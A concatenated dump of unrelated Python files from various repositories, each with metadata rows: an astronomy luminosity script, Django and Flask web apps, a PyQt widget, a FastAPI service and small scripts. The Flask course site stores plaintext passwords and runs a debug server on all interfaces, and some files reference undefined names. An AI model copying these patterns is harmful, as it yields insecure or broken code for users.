merged_list = [(list_to_sort[i], other_list[i]) for i in range(len(list_to_sort))]
sorted_list = sorted(merged_list, key=lambda x: x[0])
return [elem[0] for elem in sorted_list], [elem[1] for elem in sorted_list]
def calculate_Lbol_for_molecule(fluxes, mol, JytoK):
Lbol_source = []
for line in fluxes:
new_line = []
for i in range(1,len(line)):
flux_Jy_kms = line[i]*JytoK # 2k/lambda^2 * T_mb [Jy*km/s]
flux_Jy_Hz = flux_Jy_kms/((c/1000.)/freq[mol]) # F [Jy*Hz] = F [Jy*km/s] / lambda[km]
L_bol = (1e-26*flux_Jy_Hz*4.0*m.pi*(DIST*3.0857e16)**2)/L_sun
print(L_bol)
new_line.append(L_bol)
Lbol_source.append(new_line)
return Lbol_source
def estimate_conversion_factor(freq):
wavelength = c*1000/freq #in mm
mms = [elem for elem in conversion_factor.keys()]
Jy_K = [elem for elem in conversion_factor.values()]
a, b, r, p, stdev = regr(mms, Jy_K)
y = a * wavelength + b
return y
def make_log_list(old_list):
new_list = []
for elem in old_list:
if elem != 0:
new_list.append(m.log10(elem))
else:
new_list.append(elem)
return new_list
def main():
data = read_data('SMM_fluxes')
fluxes = create_flux_list(data)
JytoK_CN = estimate_conversion_factor(freq['CN'])
JytoK_HCN = estimate_conversion_factor(freq['HCN'])
Lbol_CN = calculate_Lbol_for_molecule(fluxes, 'CN', JytoK_CN)
Lbol_HCN = calculate_Lbol_for_molecule(fluxes, 'HCN', JytoK_HCN)
Lbol = [78.7, 4.1, 6.9, 4.4, 3.7, 43.1, 0.2, 10.3, 6.2, 5.7]
Tbol = [35, 31, 35, 77, 151, 532, 15, 35, 83, 97]
CN_list = [point[0] for point in Lbol_source]
HCN_list = [point[1] for point in Lbol_source]
CS_list = [point[2] for point in Lbol_source]
Lbol, CN_list = sort_points(Lbol, CN_list)
Lbol = make_log_list(Lbol)
CN_list = make_log_list(CN_list)
a, b, stderr = fit_linear_regression(Lbol, CN_list)
pearson = calculate_pearson(Lbol, CN_list)
plot_correlation(Lbol, CN_list, a, b, pearson)
#write_data('CN_Lbol_corr.txt', fluxes, a, b, pearson, stderr)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
e75b0875409a78b37d8d31a235ea8c260247ca24 | a702762648baeaaf48e2fe623707caf484d721ce | /TenniSoda/wsgi.py | 5b9f89108963219648b07e326451a95fa8f1f873 | [] | no_license | Championzb/TenniSoda | f0414d4d50e5c0bf766e7933390c8c9c433e90e6 | 057b6d6ea0782eb761aac10e6f7f94620476807d | refs/heads/master | 2020-05-31T05:49:11.007701 | 2015-03-27T16:54:32 | 2015-03-27T16:54:32 | 20,361,046 | 0 | 0 | null | 2014-06-21T02:42:13 | 2014-05-31T17:25:56 | CSS | UTF-8 | Python | false | false | 645 | py | """
WSGI config for TenniSoda project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "TenniSoda.settings")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
"""
import os
import sys
os.environ['DJANGO_SETTINGS_MODULE'] = 'TenniSoda.settings'
import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()
path = '/root/TenniSoda'
if path not in sys.path:
sys.path.append(path)
"""
| [
"[email protected]"
] | |
56d35c8be025ff1d54f1f4ad818ab5e623008fe1 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_herding.py | 2aa0cb990f8008f89f85be0e917a16355fd6d51e | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py |
#calss header
class _HERDING():
def __init__(self,):
self.name = "HERDING"
self.definitions = herd
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['herd']
| [
"[email protected]"
] | |
06e974b302ffa4d3cb39f52e50406a79d78f7264 | 505dc7e998f921177b61cc88a1fc7ec71d98b7de | /main/migrations/0002_post_title_tag.py | e07c5c311e18975c1e4f4c6aa3ebbfefaa7927ba | [] | no_license | Jerome4914/Blog | f2a64cf43ea7f3caf816d744f9bb8356ef6f1822 | 32aa532351d2b6773f14f713b6dbf9ae328ad26a | refs/heads/main | 2023-08-06T15:44:08.259064 | 2021-10-08T07:17:22 | 2021-10-08T07:17:22 | 401,833,896 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | # Generated by Django 2.2 on 2021-08-31 17:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='post',
name='title_tag',
field=models.CharField(default='My Blog', max_length=255),
),
]
| [
"[email protected]"
] | |
ab6114c3cbc6fcae25a05ce741d018a20a657aba | eaf319e5d25a9bbf9ce9bb9ff596efda7e0b1ac5 | /deviceselectwidget.py | ca3592aeca69218454512895becb6d9b83e840af | [] | no_license | igrekus/mult_i1_measure | 4a3e43b99c66e0288bb042ecb47907c60aa3c224 | bcee674c0cfcb5f7de02dcf5d804b7a5be3449aa | refs/heads/master | 2020-05-24T01:04:14.936612 | 2019-08-19T10:38:51 | 2019-08-19T10:38:51 | 187,028,327 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,157 | py | from PyQt5.QtCore import pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import QWidget, QVBoxLayout, QRadioButton, QButtonGroup, QLabel, QComboBox
class DeviceSelectWidget(QWidget):
selectedChanged = pyqtSignal(str)
def __init__(self, parent=None, params=None):
super().__init__(parent=parent)
self._layout = QVBoxLayout()
self._label = QLabel('Прибор')
self._combo = QComboBox()
for i, label in enumerate(params.keys()):
self._combo.addItem(label)
self._layout.addWidget(self._label)
self._layout.addWidget(self._combo)
self.setLayout(self._layout)
self._combo.setCurrentIndex(0)
self._combo.currentIndexChanged[str].connect(self.on_indexChanged)
self._enabled = True
@property
def selected(self):
return self._combo.currentText()
@pyqtSlot(str)
def on_indexChanged(self, text):
self.selectedChanged.emit(text)
@property
def enabled(self):
return self._enabled
@enabled.setter
def enabled(self, value: bool):
self._enabled = value
self._combo.setEnabled(value)
| [
"[email protected]"
] | |
0b3748a7100aa612a78fc96bc481e5e90e940cf3 | 78518b65b6823ac42b20515ae7716ada4b59db3d | /手写代码/第17章 智能算法/17_3.py | 33d3e08f23e41d7ca1f5669656876126df991ba9 | [] | no_license | YunHao-Von/Mathematical-Modeling | 70d6ad8f2f543751883afdc85aa19b1c80a106a0 | 4fe153453cccb4b474166c104e08d13ed72bc5ac | refs/heads/master | 2023-03-02T23:16:40.839865 | 2021-02-15T09:52:24 | 2021-02-15T09:52:24 | 339,029,227 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 326 | py | from sklearn.linear_model import Perceptron
import numpy as np
x0 = np.array([
[-0.5, -0.5, 0.3, 0.3],
[-0.5, 0.5, -0.5, 1.0]
]).T
y0 = np.array([1, 1, 0, 0])
md = Perceptron(tol=1e-3)
md.fit(x0, y0)
print(md.coef_, md.intercept_)
print(md.score(x0, y0))
print("预测值为:\n", md.predict(np.array([[-0.5, 0.2]])))
| [
"[email protected]"
] | |
16334c323a1baf3cb4ef5e1fb4385aa513405fd9 | 30abe88a996722bd714cbae02d2b5403df0f6746 | /scripts_new/6_determine_target_releases.py | f29b708b374153ed22e2b36963e66f15f3d69a2a | [] | no_license | KilbyBaron/Not-All-Bugs-Are-The-Same | 5a293c64062db86982f0f63ab27eb3c1666338c8 | 5b30826407452d5c9796b4c0e4a2337bb95b112e | refs/heads/master | 2020-08-18T21:38:09.087774 | 2020-01-03T17:12:29 | 2020-01-03T17:12:29 | 215,835,380 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,297 | py | import os
import pandas as pd
import numpy as np
import re
import time
import datetime
import math
"""
This script locates the 3 consecutive minor releases of each project
with the most post release bug fixing commits.
"""
def count_pre_post():
version_data = pd.read_csv(dir+"/intermediate_files/release_dates/version_data.csv")
version_data['date'] = pd.to_datetime(version_data['date'])
bfcs = pd.read_csv(dir+"/intermediate_files/bugfixingcommits.csv")
#Make sure all time columns are of the correct type
#bfcs['committerTime'] = pd.to_numeric(bfcs['BFC_date'], errors='coerce')
#bfcs = bfcs[pd.notnull(bfcs['BFC_date'])]
#bfcs['committerTime'] = pd.to_datetime(bfcs['BFC_date'], unit='s')
bfcs['BFC_date'] = pd.to_datetime(bfcs['BFC_date'])
count = {}
for bfc_index, bfc_row in bfcs.iterrows():
if not np.isnan(bfc_row['major']):
proj = bfc_row['project'].lower()
major = int(bfc_row['major'])
minor = int(bfc_row['minor'])
rel = str(major)+"."+str(minor)
commit_date = pd.to_datetime(bfc_row['BFC_date'],unit='s')
vd_row = version_data.loc[(version_data['project'] == proj) & (version_data['major'] == major) & (version_data['minor'] == minor)]
if vd_row.shape[0] > 0:
rel_date = vd_row['date'].iloc[0]
pre = 0
if rel_date > commit_date:
pre = 1
post = 1-pre
if proj in count:
if rel in count[proj]:
count[proj][rel]["pre"] += pre
count[proj][rel]["post"] += post
else:
count[proj][rel] = {"pre":pre, "post":post}
else:
count[proj] = {rel:{"pre":pre, "post":post}}
#Create empty df and fill it
df = pd.DataFrame(columns=['project','release','major','minor','pre','post'])
for k1 in count:
for k2 in count[k1]:
df = df.append({
'project': k1,
'release': k2,
'major': k2.split(".")[0],
'minor' : k2.split(".")[1],
'pre': count[k1][k2]["pre"],
'post': count[k1][k2]["post"]
},ignore_index=True)
return df
#Working directory
dir = os.getcwd()+"/.."
os.chdir(dir)
#new df to fill with target releases
targets = pd.DataFrame(columns=['project','release','major','minor', 'pre', 'post'])
#count the number of commits for each release
df = count_pre_post()
print(sum(df['post'].tolist()))
df['minor'] = df['minor'].astype(int)
df['major'] = df['major'].astype(int)
print(df.loc[df['project']=='felix'])
#Import version data to find exact release numbers
version_data = pd.read_csv(dir+"/intermediate_files/release_dates/version_data.csv")
#Find the 3 consecutive releases in each project with the most pre-release bfcs
projects = ["accumulo","bookkeeper","camel","cassandra","cxf","derby","hive","openjpa","pig","wicket"] #Felix intentionally omitted, added seperately afterward
for project in projects:
#target will hold the major/minor of the first target release
target = None
most_post_commits = 0
#Get a df of the commit counts for the current project
p_df = df.loc[df['project'] == project]
#Loop through a list of all major versions
major_versions = set(p_df['major'].tolist())
for maj in major_versions:
#Loop through a list of all minor versions in the current major version
pv_df = p_df.loc[p_df['major'] == maj]
minor_versions = set(pv_df['minor'].tolist())
for minor in minor_versions:
#If there exist 3 consecutive minor releases starting from the current minor release,
#and the sum of post-release bfcs is the most so far, save the major/minor
if minor+1 in minor_versions and minor+2 in minor_versions:
c1 = pv_df.loc[pv_df['minor'] == minor].iloc[0]['post']
c2 = pv_df.loc[pv_df['minor'] == minor+1].iloc[0]['post']
c3 = pv_df.loc[pv_df['minor'] == minor+2].iloc[0]['post']
if most_post_commits < c1+c2+c3:
most_post_commits = c1+c2+c3
target = {'major':maj,'minor':minor}
#Add the 3 target releases to the target dataframe
for x in range(3):
if target == None:
print(project,"targets not found!")
else:
p_row = p_df.loc[(p_df['major'] == target['major']) & (p_df['minor'] == target['minor']+x)].iloc[0]
v = version_data.loc[(version_data['major'] == target['major']) & (version_data["minor"] == target['minor']+x)].iloc[0]['release']
targets = targets.append({'project':project,'release':v,'major':target['major'],'minor':target['minor']+x, 'pre':p_row['pre'], 'post':p_row['post']},ignore_index=True)
#Set felix afterward since we had to decide the releases manually
targets = targets.append(df.loc[(df['project']=='felix')&(df['minor']!=2)])
targets.to_csv(dir+"/intermediate_files/target_releases.csv", index=False)
| [
"[email protected]"
] | |
8389770d0730504c914a4e099e8054f4ee6b6b14 | 98c5349213b5705f1870e506f3ab729dbefb55a9 | /app.py | 08335e0bca452a1057e24a468a4ff3b43b4d6b92 | [] | no_license | aritroper/TheOnionPeeler | 3810adc31747915f3b2b9ab1f02081aa5d88de68 | 55f2deaa5e9333f60479c31deb6e6db80890e53e | refs/heads/master | 2020-05-17T11:52:51.175166 | 2019-04-26T21:45:15 | 2019-04-26T21:45:15 | 182,567,210 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,442 | py | import praw
from random import shuffle, randint
from flask import *
app = Flask(__name__)
# Updates for article in question
is_true = True
s_link = ""
@app.route("/", methods=["GET", "POST"])
def index():
return render_template("index.html", headline=generate_headline())
@app.route("/guess", methods=["GET", "POST"])
def guess():
print("app.py: " + str(is_true))
print("app.py: " + s_link)
if is_true:
return jsonify(is_true = True, link = s_link)
else:
return jsonify(is_true = False, link = s_link)
# Reddit instance
reddit = praw.Reddit(client_id = 'M4K5s4jT-5OV1g',
client_secret = '9MfkJKY5Wt2VkrMBzdOkojEGNJ8',
user_agent = 'Onion Peeler')
realNews = []
fakeNews = []
# Fetches 100 of the hottest r/notheonion and r/theonion posts
def update_news() :
global realNews
global fakeNews
# Fetch real news from r/nottheonion
realNews = list(reddit.subreddit('nottheonion').hot(limit = 100))
# Fetch fake news from r/theonion
fakeNews = list(reddit.subreddit('theonion').hot(limit = 100))
# Returns a headline and also if it's true or not
def generate_headline() :
global is_true
global s_link
update_news()
shuffle(realNews)
shuffle(fakeNews)
r = randint(1, 2)
# Generate real news.
if r == 1:
is_true = True
s_link = realNews[0].url
return realNews[0].title.upper()
# Generate fake news.
else:
is_true = False
s_link = fakeNews[0].url
return fakeNews[0].title.upper()
| [
"[email protected]"
] | |
8eced85c27eae6bed3281d1ca966cb978c8f304a | a3aaa7cbfb658218456be1d6e4e5b6060c454a87 | /util.py | c84f4aaf1780bfd780bd7161617eda33b7bc6577 | [] | no_license | nick9914/machine_learning_for_trading | 825ad0ab017546f92b895fe91a13343356f63932 | 9fa50a917111def922cdc67eccef16f9f5d3159b | refs/heads/master | 2020-04-11T06:04:49.095902 | 2019-05-06T03:38:17 | 2019-05-06T03:38:17 | 124,329,260 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,822 | py | """MLT: Utility code.
Copyright 2017, Georgia Tech Research Corporation
Atlanta, Georgia 30332-0415
All Rights Reserved
"""
import os
import pandas as pd
def symbol_to_path(symbol, base_dir=None):
"""Return CSV file path given ticker symbol."""
if base_dir is None:
base_dir = os.environ.get("MARKET_DATA_DIR", '../data/')
return os.path.join(base_dir, "{}.csv".format(str(symbol)))
def get_data(symbols, dates, addSPY=True, colname = 'Adj Close', dropNonTradingSPY=True):
"""Read stock data (adjusted close) for given symbols from CSV files."""
df = pd.DataFrame(index=dates)
if addSPY and 'SPY' not in symbols: # add SPY for reference, if absent
symbols = ['SPY'] + symbols
for symbol in symbols:
df_temp = pd.read_csv(symbol_to_path(symbol), index_col='Date',
parse_dates=True, usecols=['Date', colname], na_values=['nan'])
df_temp = df_temp.rename(columns={colname: symbol})
df = df.join(df_temp)
if dropNonTradingSPY and symbol == 'SPY': # drop dates SPY did not trade
df = df.dropna(subset=["SPY"])
return df
def plot_data(df, title="Stock prices", xlabel="Date", ylabel="Price"):
import matplotlib.pyplot as plt
"""Plot stock prices with a custom title and meaningful axis labels."""
ax = df.plot(title=title, fontsize=12)
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
plt.show()
def get_orders_data_file(basefilename):
return open(os.path.join(os.environ.get("ORDERS_DATA_DIR",'orders/'),basefilename))
def get_learner_data_file(basefilename):
return open(os.path.join(os.environ.get("LEARNER_DATA_DIR",'Data/'),basefilename),'r')
def get_robot_world_file(basefilename):
return open(os.path.join(os.environ.get("ROBOT_WORLDS_DIR",'testworlds/'),basefilename))
| [
"[email protected]"
] | |
10fdba63f4eb65b2041a156081fd3b9245f73110 | c270323cb953e917b06601791fa71ab093f86df8 | /app.py | 12d629a239f4e03002fd0f9caaa4aa74fc743bd2 | [] | no_license | masheilmir/CourseWebsite | 6017d85c30ee688036585d2c4719d79498a1afc1 | e56f7d025dba42ae2576cf13f604d8aafd39276f | refs/heads/master | 2022-12-12T10:23:22.104005 | 2020-09-08T00:57:05 | 2020-09-08T00:57:05 | 256,661,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,608 | py | from flask import Flask, render_template, request, g, flash, redirect, session, abort, url_for, escape, Markup
import sqlite3
import os
DATABASE = './database.db'
# the function get_db is taken from here:
# https://flask.palletsprojects.com/en/1.1.x/patterns/sqlite3/
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = sqlite3.connect(DATABASE)
return db
# the function make_dicts is taken from here:
# https://flask.palletsprojects.com/en/1.1.x/patterns/sqlite3/
def make_dicts(cursor, row):
return dict((cursor.description[idx][0], value)
for idx, value in enumerate(row))
# the function query_db is taken from here:
# https://flask.palletsprojects.com/en/1.1.x/patterns/sqlite3/
def query_db(query, args=(), one=False):
cur = get_db().execute(query, args)
rv = cur.fetchall()
cur.close()
return (rv[0] if rv else None) if one else rv
app = Flask(__name__)
app.secret_key = os.urandom(12)
# the function close_connection is taken from here:
# https://flask.palletsprojects.com/en/1.1.x/patterns/sqlite3/
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
@app.route('/')
def medium():
if not session.get('logged_in'):
return render_template('loginUser.html')
else:
return redirect(url_for('showHome'))
@app.route('/login', methods=['GET', 'POST'])
def user_login():
if request.method == "POST":
return validateUser()
else:
return render_template('loginUser.html')
@app.route('/logout')
def user_logout():
session['logged_in'] = False
session['student'] = False
session['instructor'] = False
return medium()
@app.route('/registerPortal')
def showRegister():
if not session.get('logged_in'):
return render_template('registerUser.html')
return redirect(url_for('showHome'))
@app.route('/registerAction', methods=['POST'])
def registerUser():
if not session.get('logged_in'):
userFname = request.form['firstname']
username = request.form['username']
password = request.form['password']
userType = request.form.get('usertype')
db = get_db()
db.row_factory = make_dicts
sUserExist = query_db("SELECT username FROM Student WHERE username = ?", [
username], one=True)
iUserExist = query_db("SELECT username FROM Instructor WHERE username = ?", [
username], one=True)
if (sUserExist is not None) or (iUserExist is not None):
flash(Markup(
"User already exists. Are you sure <i>this</i> isn't your account?"))
return redirect(url_for('showRegister'))
else:
if (userFname == '') or (username == '') or (password == '') or (userType == 'Select a user type'):
flash("You forgot to input first name/username/password/user type")
return redirect(url_for('showRegister'))
elif (userType == 'student') and (('instructor' in username) or ('instructor' in password)):
flash("You shouldn't be logging into this type of user!")
return redirect(url_for('showRegister'))
elif (userType == 'instructor') and (('student' in username) or ('student' in password)):
flash("You shouldn't be logging into this type of user!")
return redirect(url_for('showRegister'))
elif userType == 'student':
query_db("INSERT INTO Student (username, password, fname) VALUES (?, ?, ?)", [
username, password, userFname])
db.commit()
db.close()
flash("You've successfully created an account.")
return redirect(url_for('showRegister'))
else:
query_db("INSERT INTO Instructor (username, password, fname) VALUES (?, ?, ?)", [
username, password, userFname])
db.commit()
db.close()
flash("You've successfully created an account.")
return redirect(url_for('showRegister'))
return redirect(url_for('showHome'))
@app.route('/validateUser', methods=['POST'])
def validateUser():
username = request.form['username']
password = request.form['password']
db = get_db()
db.row_factory = make_dicts
studentUser = query_db("SELECT username FROM Student WHERE username = ? AND password = ?", [
username, password], one=True)
instructorUser = query_db("SELECT username FROM Instructor WHERE username = ? AND password = ?", [
username, password], one=True)
db.close()
if studentUser is None and instructorUser is None:
flash('Incorrect information provided, please try a different username/passsword.')
session['logged_in'] = False
return redirect(url_for('medium'))
elif studentUser is not None:
session['user'] = studentUser['username']
session['logged_in'] = True
session['student'] = True
return redirect(url_for('medium'))
elif instructorUser is not None:
session['user'] = instructorUser['username']
session['logged_in'] = True
session['instructor'] = True
return redirect(url_for('medium'))
@app.route('/home')
def showHome():
if session.get('logged_in') and session.get('student'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Student WHERE username = ?", [
username], one=True)
return render_template('index.html', user=name['fname'])
elif session.get('logged_in') and session.get('instructor'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
return render_template('index.html', user=name['fname'])
else:
return redirect(url_for('medium'))
@app.route('/lectures')
def showLectures():
if session.get('logged_in') and session.get('student'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Student WHERE username = ?", [
username], one=True)
return render_template('lectures.html', user=name['fname'])
elif session.get('logged_in') and session.get('instructor'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
return render_template('lectures.html', user=name['fname'])
else:
return redirect(url_for('medium'))
@app.route('/assignments')
def showAssignments():
if session.get('logged_in') and session.get('student'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Student WHERE username = ?", [
username], one=True)
return render_template('Assignments.html', user=name['fname'])
elif session.get('logged_in') and session.get('instructor'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
return render_template('Assignments.html', user=name['fname'])
else:
return redirect(url_for('medium'))
@app.route('/resources')
def showResources():
if session.get('logged_in') and session.get('student'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Student WHERE username = ?", [
username], one=True)
return render_template('resources.html', user=name['fname'])
elif session.get('logged_in') and session.get('instructor'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
return render_template('resources.html', user=name['fname'])
else:
return redirect(url_for('medium'))
@app.route('/labs')
def showLabs():
if session.get('logged_in') and session.get('student'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Student WHERE username = ?", [
username], one=True)
return render_template('labs.html', user=name['fname'])
elif session.get('logged_in') and session.get('instructor'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
return render_template('labs.html', user=name['fname'])
else:
return redirect(url_for('medium'))
@app.route('/tests')
def showTests():
if session.get('logged_in') and session.get('student'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Student WHERE username = ?", [
username], one=True)
db.close()
return render_template('Tests.html', user=name['fname'])
elif session.get('logged_in') and session.get('instructor'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
db.close()
return render_template('Tests.html', user=name['fname'])
else:
return redirect(url_for('medium'))
@app.route('/grades')
def getGrades():
if session.get('logged_in'):
username = session.get('user')
sBoolean = session.get('student')
iBoolean = session.get('instructor')
db = get_db()
db.row_factory = make_dicts
if sBoolean:
Sid = query_db("SELECT Sid FROM Student WHERE username = ?", [
username], one=True)
sGrades = query_db(
"SELECT mark, eval FROM Marks WHERE Sid = ?", [Sid['Sid']], one=False)
name = query_db("SELECT fname FROM Student WHERE username = ?", [
username], one=True)
evaluations = query_db("SELECT DISTINCT eval FROM Marks")
db.close()
if sGrades is None:
render_template('grades.html')
return render_template('grades.html', sGrades=sGrades, user=name['fname'], evaluation=evaluations)
elif iBoolean:
Iid = query_db("SELECT Iid FROM Instructor WHERE username = ?", [
username], one=True)
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
evaluations = query_db("SELECT eval, Sid, mark FROM Marks")
remarks = query_db("SELECT Sid, eval, reason FROM Remark")
db.close()
if evaluations is None:
return render_template('grades.html')
return render_template('grades.html', user=name['fname'], evaluation=evaluations, remarks=remarks)
else:
return redirect(url_for('medium'))
@app.route('/remarkRequest', methods=['POST'])
def remarkRequest():
if session.get('logged_in') and session.get('student'):
username = session.get('user')
assignment = request.form.get('aName')
reason = request.form.get('reason')
if (assignment == 'Select an evaluation') or (reason == ''):
flash('Please select a valid evaluation/enter a valid reason.')
return redirect(url_for('getGrades'))
else:
db = get_db()
db.row_factory = make_dicts
Sid = query_db("SELECT Sid FROM Student WHERE username = ?", [
username], one=True)
# insert into db
query_db("INSERT INTO Remark (Sid, reason, eval) VALUES (?, ?, ?)", [
Sid['Sid'], reason, assignment])
db.commit()
db.close()
flash("Anonymous feedback sent.")
return redirect("/grades")
elif session.get('logged_in') and session.get('instructor'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
db.close()
return redirect("/grades")
else:
return redirect(url_for('medium'))
@app.route('/enterGrades', methods=['POST'])
def enterGrades():
if session.get('logged_in') and session.get('instructor'):
username = session.get('user')
stNum = request.form.get('sNum')
assignment = request.form.get('aName')
grade = request.form.get('pGrade')
if (assignment == '') or (stNum == '') or (grade == ''):
flash('Please ensure all fields have been completed.')
return redirect(url_for('getGrades'))
else:
db = get_db()
db.row_factory = make_dicts
Iid = query_db("SELECT Iid FROM Instructor WHERE username = ?", [
username], one=True)
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
# insert into db
query_db("INSERT INTO Marks (Sid, mark, eval, Iid) VALUES (?, ?, ?, ?)", [
int(stNum), float(grade), assignment, Iid['Iid']])
db.commit()
db.close()
flash('Grade added.')
return redirect("/grades")
else:
return redirect(url_for('medium'))
@app.route('/feedbacks')
def showFeedbacks():
if session.get('logged_in'):
if session.get('student'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Student WHERE username = ?", [
username], one=True)
iName = query_db("SELECT fname FROM Instructor", one=False)
return render_template('feedbacks.html', user=name['fname'], iName=iName)
elif session.get('instructor'):
username = session.get('user')
db = get_db()
db.row_factory = make_dicts
name = query_db("SELECT fname FROM Instructor WHERE username = ?", [
username], one=True)
iFeedback = query_db(
"SELECT feedback FROM Feedbacks WHERE instructor = ?", [name['fname']], one=False)
db.close()
return render_template('feedbacks.html', feedbacks=iFeedback, user=name['fname'])
else:
return redirect(url_for('medium'))
@app.route('/feedbackForm', methods=['POST'])
def createFeedbacks():
if session.get('logged_in'):
if session.get('student'):
feedback = request.form['feedback']
iName = request.form.get('instructorname')
if (feedback == '') or (iName == 'Select an instructor'):
flash("Please input a valid feedback/pick a valid instructor.")
return redirect(url_for("showFeedbacks"))
else:
db = get_db()
db.row_factory = make_dicts
query_db("INSERT INTO Feedbacks (feedback, instructor) VALUES (?, ?)", [
feedback, iName])
db.commit()
db.close()
flash('Anonymous feedback submitted!')
return redirect(url_for('showFeedbacks'))
return redirect(url_for('showHome'))
@app.route('/<page>')
def linkPages(page): # allows you to access other ages on the site
if session.get('logged_in') and '.html' in page:
return 'You got caught sneaking around the site. Go back to a valid route (starting with "/")'
elif not session.get('logged_in') and '.html' in page:
return 'You got caught sneaking around the site. Please log in and go to a valid route (starting with "/")'
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', port=5000)
| [
"[email protected]"
] | |
6d92a891992f6af7b4de9006ce4e62ea9be8b1ea | c828f5c86e8ae7a157bd3f212c4bd754ee04e5e7 | /exercise_coding_test_6.py | ed190e91d5b9b242bf252dd4909b7e95c6804591 | [] | no_license | SeungHune/beakjun | c319e33f10a3dfd3acb090a7872b900ed92c5419 | 5d4610557aa56efc41053954299924ab890812f2 | refs/heads/master | 2020-12-03T04:37:48.054739 | 2020-11-10T10:50:17 | 2020-11-10T10:50:17 | 231,204,761 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 714 | py | # 정렬 - 가장 큰 수
def solution(numbers):
if sum(numbers) == 0:
return "0"
new_numbers = []
for num in numbers:
new_numbers.append(str(num) * 3)
new_numbers.sort(reverse=True)
# print(new_numbers)
answer = ""
for num in new_numbers:
if len(num) == 3:
answer += num[0]
elif len(num) == 6:
answer += num[:2]
elif len(num) == 9:
answer += num[:3]
else:
answer += num[:4]
return answer
# print(solution([6, 10, 2]))
# print(solution([3, 30, 34, 5, 9]))
# print(solution([9, 303, 89, 898]))
# print(solution([112, 11, 121, 0]))
print(solution([40,404]))
print(solution([0,0,0,0])) | [
"[email protected]"
] | |
efad60cd854e2a20cac04b122979cbe3bc3f4a4b | 371ed532b391ab33a06015ff2c41336e8f3ff188 | /main.py | 86021e8deb76d793c69355582d09051e0d866e4c | [] | no_license | dfquicazanr/fast-backend | 5e6d25155fbff5697055bc2bd8d9f98d23e30db7 | 8f0b3275024a29631dad2de4635cb8fb1fc62e5a | refs/heads/master | 2023-04-04T08:54:37.113035 | 2021-04-12T15:28:37 | 2021-04-12T15:28:37 | 357,243,808 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,515 | py | import json
from typing import List, Optional
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from pydantic import BaseModel, ValidationError
origins = [
"http://localhost:4200"
]
class ClubMember(BaseModel):
name: str
age: int
class Club(BaseModel):
index: Optional[int] = None
club_members: List[ClubMember]
club_name: str
club_address: str
app = FastAPI()
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"]
)
def validate_list(list_object):
print(list_object)
try:
for club in list_object:
Club(**club)
except ValidationError as e:
print(e)
def get_response():
with open('database.json') as fp:
data = json.load(fp)
return {
"list": data
}
def update_club(index, club: Club):
with open('database.json', 'r') as fp:
database = json.load(fp)
clubs = database['clubs']
clubs[index] = club.dict()
database['clubs'] = clubs
with open('database.json', 'w') as fp:
fp.write(json.dumps(database, indent=2))
@app.get("/clubs")
async def get_clubs():
validate_list(get_response()['list']['clubs'])
return get_response()
@app.post("/clubs")
async def post_clubs(club: Club):
index = club.index
del club.index
update_club(index, club)
return club
| [
"[email protected]"
] | |
